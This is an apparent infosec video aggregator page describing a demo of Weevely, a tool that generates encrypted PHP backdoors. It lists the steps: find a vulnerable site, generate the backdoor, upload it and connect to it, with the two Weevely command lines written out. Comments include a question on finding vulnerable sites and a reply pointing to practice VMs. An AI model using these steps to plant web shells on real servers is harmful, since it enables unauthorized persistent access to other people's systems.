Description: Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
source :http://epinna.github.com/Weevely/
weevely is written in python. this tool is used to generate a php encrypted back door. the generated backdoor is uploaded on remote server and then we can interact through console.
this video is a simple demo of weevely to create a backdoor and upload it on server. following are the steps:
find a vulnerable site.
generate a backdoor using weevely. command is following
./weevely -g -o filepath -p password
upload this file on vulnerable server.
use following command to connect through shell.
./weevely.py -t -u http//:targetsite/backdoorname.php -p password
Tags: Backdooring , weevely , backtrack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
how to find vulnerable site for uploading this backdoor ??
hi @hackmaan don't perform this attack on live website.
If you really want to test this attack. So use some vulnerable platform. visit this link, lots of vulnerable platform collected on SecurityTube-tools
Maybe you like it
http://securitytube-tools.net/index.php?title=Vulnerable_Virtual_Machines
nice